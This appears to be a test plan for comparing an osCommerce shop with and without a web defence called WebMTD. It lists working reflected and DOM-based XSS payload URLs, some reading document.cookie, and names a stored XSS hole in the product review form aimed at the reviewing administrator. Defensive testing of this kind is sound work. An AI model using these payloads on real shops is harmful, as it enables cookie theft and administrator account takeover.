Please test the followings on a Firefox browser

Reflected XSS - test 1)

[When WebMTD is present]
case 1) http://149.56.12.232/oscommerce-webmtd/catalog/index.php?manufacturers_id=%3Cscript%3Ealert(100);%3C/script%3E
[When WebMTD is not present]
case 2) http://149.56.12.232/oscommerce-2.3.3.4/catalog/index.php?manufacturers_id=%3Cscript%3Ealert(100);%3C/script%3E

you can use <script>alert(document.cookie);</script> or any other code; please note that " and ' are escapped. 

(View the source codes of the pages, on both html documents, script block is present, but in case 1 it is not executed)

Reflected XSS - test 2)
case 1) http://149.56.12.232/oscommerce-webmtd/catalog/product_info.php?products_id=%3Cscript%3Ealert%2810%29;%3C/script%3E
case 2) http://149.56.12.232/oscommerce-2.3.3.4/catalog/product_info.php?products_id=%3Cscript%3Ealert%2810%29;%3C/script%3E

Stored XSS - test 3)
text box in catalog/product_reviews_write.php is vulnerable; the target is the administrator of the system who wants to approve the reviews.

DOM-based XSS - test 4)
[When WebMTD is present]
http://149.56.12.232/oscommerce-webmtd/catalog/product_info.php?products_id=%3Cinput%20type=%22text%22%20id=%22malicious%22%20onclick=alert(document.cookie)%3E
Note that benign event handlers are executed (look at example textbox included in the page). 
[When WebMTD is not present]
http://149.56.12.232/oscommerce-2.3.3.4/catalog/product_info.php?products_id=%3Cinput%20type=%22text%22%20id=%22malicious%22%20onclick=alert(document.cookie)%3E